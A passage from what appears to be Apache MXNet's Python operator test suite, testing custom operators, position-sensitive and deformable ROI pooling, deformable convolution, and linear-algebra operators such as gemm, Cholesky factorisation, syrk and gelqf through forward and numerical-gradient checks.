assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
